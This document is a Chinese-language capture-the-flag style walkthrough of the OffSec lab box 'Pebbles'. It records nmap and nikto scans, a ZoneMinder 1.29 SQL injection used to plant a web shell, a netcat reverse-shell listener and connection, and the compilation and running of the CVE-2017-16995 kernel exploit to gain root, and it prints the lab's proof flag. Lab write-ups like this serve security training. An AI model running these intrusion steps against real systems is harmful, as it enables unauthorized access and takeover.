主要知识点
- CVE-2019-1010268漏洞利用
- sql注入生成reverse shell
具体步骤
执行nmap扫描,很多端口开放,挨个看一下三个http端口
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-10 23:54 UTC
Nmap scan report for 192.168.51.52
Host is up (0.00060s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 aa:cf:5a:93:47:18:0e:7f:3d:6d:a5:af:f8:6a:a5:1e (RSA)
| 256 c7:63:6c:8a:b5:a7:6f:05:bf:d0:e3:90:b5:b8:96:58 (ECDSA)
|_ 256 93:b2:6a:11:63:86:1b:5e:f5:89:58:52:89:7f:f3:42 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Pebbles
|_http-server-header: Apache/2.4.18 (Ubuntu)
3305/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8080/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Apache Tomcat
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Tomcat
执行nikto扫描三个http端口,都比较类似,有zm目录
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.51.52
+ Target Hostname: 192.168.51.52
+ Target Port: 3305
+ Start Time: 2024-07-11 00:02:54 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 2c39, size: 5a8af141fc0fe, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /zm/: Cookie ZMSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /zm/: Cookie zmSkin created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /zm/: Cookie zmCSS created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /zm/: This might be interesting: potential country code (Zambia).
+ 8909 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2024-07-11 00:03:07 (GMT0) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
访问任意一个端口得到zoneminder v1.29.0安装
搜索得到其有sql注入等多个漏洞,尝试利用sql注入生成reverse shell,参考ZoneMinder (1.29,1.30) Exploitation (Multiple Vulnerabilities) | VK9 Security
打开burpsuite,利用proxy访问 zoneminder,访问使用如下参数访问 ../zm/index.php
在本地调用nc -nlvp 80后,再访问 shell5.php,reverse shell创建成功
C:\home\kali\Documents\OFFSEC\WarmUp\Pebbles_Pending\CVE-2023-26035-main> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.216] from (UNKNOWN) [192.168.116.52] 53828
bash: cannot set terminal process group (1280): Inappropriate ioctl for device
bash: no job control in this shell
www-data@pebbles:/var/www/html$
尝试寻找suid或者具备suid capability的可执行文件,均失败,于是上传linpeas.sh,得到有趣的东西,linux版本为4.4.0-21-generic,应该有内核漏洞
......
......
Linux version 4.4.0-21-generic (buildd@lgw01-21) (gcc version 5.3.1 20160413 (Ubuntu 5.3.1-14ubuntu2) ) #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016
......
......
[+] [CVE-2017-16995] eBPF_verifier
Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Exposure: highly probable
Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
Download URL: https://www.exploit-db.com/download/45010
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
下载45010号漏洞并编译后,上传至remote server,执行得到root权限
www-data@pebbles:/tmp$ chmod +x cve-2017-16995
chmod +x cve-2017-16995
www-data@pebbles:/tmp$ ./cve-2017-16995
./cve-2017-16995
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
cat /root/proof.txt
40e59a0df2f1be0a73cfba170ac26ad9